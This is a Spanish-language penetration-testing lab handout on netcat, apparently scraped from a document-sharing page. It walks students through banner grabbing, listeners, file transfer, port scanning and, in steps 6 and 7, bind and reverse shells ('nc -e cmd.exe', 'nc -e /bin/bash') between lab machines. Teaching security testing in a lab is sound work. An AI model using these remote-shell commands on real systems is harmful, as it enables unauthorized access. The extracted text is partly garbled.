Вы находитесь на странице: 1из 7

Prcticas de Laboratorio

Modulo Anlisis de Vulnerabilidades


Vulnerabilidades

PR-SEC 001

Prctica de laboratorio Anexa Nmero 3:


NETCAT bsico.
Objetivos:
Conocer de forma bsica y aplicar de forma prctica las diferentes funcionalidades
que ofrece la herramienta netcat
Recursos:
Linux Backtrack 5R2
Archivo binario nc.exe (localizado en: /pentest/windows-binaries/tools
binaries/tools) se puede
copiar y pegar a la raz de Windows XP usando VMWARE.
Equipo Windows XP atack
Recomendaciones:
Copiar y/o descargar la herramienta netcat (nc.exe) a la raz (c) del disco duro de la
maquina Windows XP atack. (Se puede encontrar un archivo dentro de la pagina web
www.dsteamseguridad.com/hackingc4 dentro de la carpeta de explotacin,
explotacin carpeta
tools, all encontraras un archivo llamado nc.txt, bjalo a la raz del disco duro d
Windows XP y renmbralo como nc.exe)
Las mquinas virtuales Linux Backtrack y Windows XP atack, deben de tener conexin
entre s (probar lo anterior con el comando ping)
Introduccin:
Netcat es una herramienta que apoya las labores de Hacking y Penetration
n Testing,
T
la cual es
llamada la navaja suiza,, por la variedad de usos que se le puede dar a esta poderosa
herramienta. Fue inicialmente escrita en octubre de 1996,, pero con el paso del tiempo, y el
avance de las tecnologas de la informacin, han aparecido otras versiones mejoradas de esta
herramienta. Fue una herramienta escrita
esc
inicialmente para sistemas UNIX, pero a la fecha
existen versiones de netcat para diversos sistemas operativos.
operativo
Justificando el nombre con que se conoce esta herramienta, el cual es la navaja suiza,
suiza netcat
sirve para realizarr las siguientes labores:
Abrir puertos TCP y trabajar
trabaj sobre ellos
Permite conexiones del tipo (Cliente/Servidor)
Hacer scanning de puertos
realizar procesos
rocesos de Banner Grabbing
Abrir puertas traseras (Backdoors)
Trasferir archivos
Redireccionar puertos
Y mucho mass..................

Para conocer ms de esta herramienta, se debe de realizar la siguiente prctica de laboratorio:

Ejecucin del taller de laboratorio:


Paso nmero 1 "Ayuda y opciones de netcat": Ejecutar desde la consola de comandos de
Linux backtrack el siguiente comando: nc -h
Con el anterior comando se podrn ver todas las opciones de netcat con su respectiva
explicacin.

Paso nmero 2 "Banner Grabbing": Utilizar netcat para conectarse a un servicio TCP que
sabemos est abierto. Para el caso vamos a usar el puerto TCP 21 que est a la escucha en el
equipo Windows Server 2003 Megatron. Lo anterior se logra con el siguiente comando:
nc -vn direccion_ip_windows_server numero_puerto

Paso nmero 3 "Abrir un puerto con netcat": Utilizar netcat para poner un puerto a la
escucha. Para lograr lo anterior, debemos de hacer lo siguiente:
Ejecutar el siguiente comando en el equipo Windows XP (desde la consola de
comandos cmd.exe.
nc -lvp 4447

Y desde la maquina Linux backtrack, ejecutar el siguiente comandos desde la shell de


comandos.
nc -v direccion ip windows XP 4447
Para probar ambas conexiones, comenzar a realizar un tipo de chat entre ambas maquinas, tal
y como se muestra en las siguientes imgenes.
Maquina que abre la conexin (windows XP)

Maquina que se conecta al puerto TCP 4447 (Linux Backtrack)

Nota: La anterior conexin puede interpretarse como una conexin del tipo bridge (entre
cliente y servidor), ya que no hay dispositivos del tipo Router o Firewall entre las conexiones
del cliente y el servidor.
Paso nmero 4 "Trasferencia de archivos con netcat": Utilizar netcat para trasferir archivos
entre dos maquinas, que para el caso sern Windows XP atack y Linux Backtrack. Para poder
trasferir archivos entre ambas maquinas, se debe de hacer lo siguiente:
En la maquina Linux, ejecutar el siguiente comando: nc -lvp 7777 > output.txt
Luego desde la maquina con Windows XP, crear un archivo de texto sencillo con el
siguiente comando:

Luego desde la maquina Windows XP se debe de digitar el siguiente comando:


nc -vv ip_de_ backtrack 7777 < texto.txt
Esperar unos segundos para que el comando se termine de ejecutar...
Luego ingresar a backtrack y darle las teclas ctrl+C para detener la ejecucin de netcat

Finalmente se debe de verificar en linux backtrack, si el archivo se ha trasferido


correctamente. Lo anterior se logra digitando el comando cat, seguido del nombre del
archivo.

Paso nmero 5 "Scanning de Puertos con netcat": Utilizar netcat para realizar un scanning
bsico de puertos. Lo anterior se puede lograr ejecutando el siguiente comando desde la
maquina Linux backtrack. (Usar como target destino Windows 2003 Server megatron)

Paso nmero 6 "Administracin remota (Conexin Directa) con netcat": Utilizar netcat para
realizar procesos de administracin remota de host. Para lograr administrar de forma remota
una maquina Linux, y-o Windows, se debe de realizar lo siguiente:
Administracin de la maquina Windows XP, desde Linux Backtrack (Ambas en conexin tipo
Bridge-Conexin directa)
Localizado en la consola de comandos de Windows XP (cmd.exe) ejecutar el siguiente
comando netcat: nc -lvvp 4445 -e cmd.exe

Luego ingresar a la consola de comandos de Linux backtrack, y ejecutar el siguiente


comando:
nc -vnn direccion_ip_Windows_XP 4445

Nota: Se debe de esperar unos segundos para que se abra la conexin. Ahora se pueden
ejecutar comandos cmd.exe desde backtrack

Administracin de la maquina Linux Backtrack desde Windows XP


Ingresar a la consola de comandos de Linux backtrack, y ejecutar el siguiente
comando: nc -lvvp 12345 -e /bin/bash

Luego ingresar a la consola de comandos de Windows XP (cmd.exe) y ejecutar el


siguiente comando:
nc -vnn direccion-ip_backtrack 12345

Nota: Se debe de esperar unos segundos para que se abra la conexin. Ahora se pueden
ejecutar comandos bin/bash desde la consola de comandos cmd.exe de windows XP-

Paso nmero 7 "Administracin remota (Conexin reversa) con netcat": Utilizar netcat para
realizar procesos de administracin remota de host. Para lograr administrar de forma remota
una maquina Linux, y-o Windows, se debe de realizar lo siguiente:
Administracin de la maquina Windows XP, desde Linux Backtrack (Usando conexin tipo NATFIREWALL-ROUTER-Conexin reversa)

Localizado en la consola de comandos de Linux Backtrack, ejecutar el siguiente


comando, para poner un puerto TCP a la escucha (Listening).
nc -lvvp 5555

Luego se debe de lanzar el siguiente comando desde el equipo Windows XP:


nc -nv direccion_ip_backtrack 5555 -e cmd.exe

De forma automtica Linux backtrack debe de tener una shell de comandos cmd.exe,
logrando as una conexin reversa (No directa)

Administracin de la maquina Linux Backtrack desde una maquina Windows XP (Usando


conexin tipo NAT-FIREWALL-ROUTER-Conexin reversa)

Localizado en la consola de comandos de Windows XP, ejecutar el siguiente comando,


para poner un puerto TCP a la escucha (Listening).
nc -lvvp 8888

Luego se debe de lanzar el siguiente comando desde el equipo Linux Backtrack:


nc -nv direccion_ip_win_XP 8888 -e /bin/bash

Si volvemos a la maquina Windows XP, observamos que luego de unos segundos se


abre de forma automtica una shell donde podemos ejecutar comandos desde la shell
de Windows (cmd.exe) a la shell de Linux backtrack.(Ver la siguiente imagen)

Вам также может понравиться